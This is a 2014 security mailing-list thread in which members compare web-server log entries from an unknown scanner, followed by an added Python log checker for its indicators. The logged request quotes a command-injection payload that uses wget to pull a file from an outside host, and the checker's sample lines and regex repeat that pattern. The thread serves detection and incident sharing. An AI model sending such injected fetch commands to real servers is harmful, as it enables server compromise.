PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Robin Wood <robin@digi.ninja>
Date: Mon, 28 Jul 2014 23:09:40 +0100
I was hit this morning about 635 GMT+1 from 162.253.66.77

My site is just a simple honeypot type site, nothing special just logs hits.

Robin

On 28 Jul 2014 17:46, "Xavier Mertens" <xavier () rootshell be> wrote:

> +1
> One site was scanned at 07:55 (GMT+1)
> The site was a mailman front-end. And yours?
>
> /x
>
> --
> "If the enemy leaves a door open, you must rush in." - Sun Tzu
> PGP Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C
>
> On 28 Jul 2014, at 16:30, Frank Michael <frankcmichael () gmail com> wrote:
>
> > Various sources confirming the same thing for other sites. All on 7/28. Keep an eye open.
> >
> > On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:
> >
> > > I've got a site that was scanned this morning by a tool that left these entries in the logs:
> > >
> > > [HTTP_USER_AGENT] => chroot-apach0day
> > > [HTTP_REFERRER] => /xA/x0a/x05
> > > [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget% 20proxypipe.com/apach0day;
> > >
> > > Anyone recognise it? That user agent isn't coming up in google searches.
> > >
> > > Robin
> > > _______________________________________________
> > > Pauldotcom mailing list
> > > Pauldotcom () mail securityweekly com
> > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > > Main Web Site: http://pauldotcom.com
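A log check built from the indicators reported in this thread, added here as an example and not posted by any list member: it flags Apache access-log lines that carry the reported User-Agent or a shell separator followed by wget/curl in the request target. It assumes Apache's combined log format; the sample lines, their addresses and the example.invalid domain are constructed.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat; assumes this format, adjust for a custom LogFormat.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SCANNER_AGENT = "chroot-apach0day"  # User-Agent string reported in the thread
# Heuristic: shell separator followed by a download tool, like ";wget%20..." in the thread.
CMD_FETCH = re.compile(r'(?:[;|`]|&&|\$\()\s*(?:wget|curl)\b', re.IGNORECASE)

def classify(line):
    """Return a dict with match reasons, or None if the line is not in combined format."""
    m = COMBINED.match(line.strip())
    if m is None:
        return None
    reasons = []
    if SCANNER_AGENT in m["agent"].lower():
        reasons.append("user-agent")
    # Decode twice so a double-encoded separator (%253B) is still seen.
    target = unquote(unquote(m["target"]))
    if CMD_FETCH.search(target):
        reasons.append("command-in-uri")
    return {"host": m["host"], "time": m["time"], "status": m["status"], "reasons": reasons}

def scan(lines):
    """Return (hits, unparsed_count); unparsed lines are counted, not silently dropped."""
    hits, unparsed = [], 0
    for line in lines:
        rec = classify(line)
        if rec is None:
            unparsed += 1
        elif rec["reasons"]:
            hits.append(rec)
    return hits, unparsed

# Constructed sample lines (documentation addresses, placeholder domain).
SAMPLE = [
    '192.0.2.10 - - [28/Jul/2014:06:35:02 +0100] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20example.invalid/apach0day; HTTP/1.1" 200 312 "/xA/x0a/x05" "chroot-apach0day"',
    '198.51.100.7 - - [28/Jul/2014:06:36:10 +0100] "GET /docs/wget-manual.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jul/2014:07:55:41 +0100] "GET /?a=1%253Bwget%2520example.invalid/x HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    'not an access log line',
]

if __name__ == "__main__":
    hits, unparsed = scan(SAMPLE)
    for h in hits:
        print(h["time"], h["host"], h["status"], ",".join(h["reasons"]))
    print("unparsed lines:", unparsed)
```

The status field is kept in each hit because a 200 on such a request deserves a closer look at what the server returned than a 404 does.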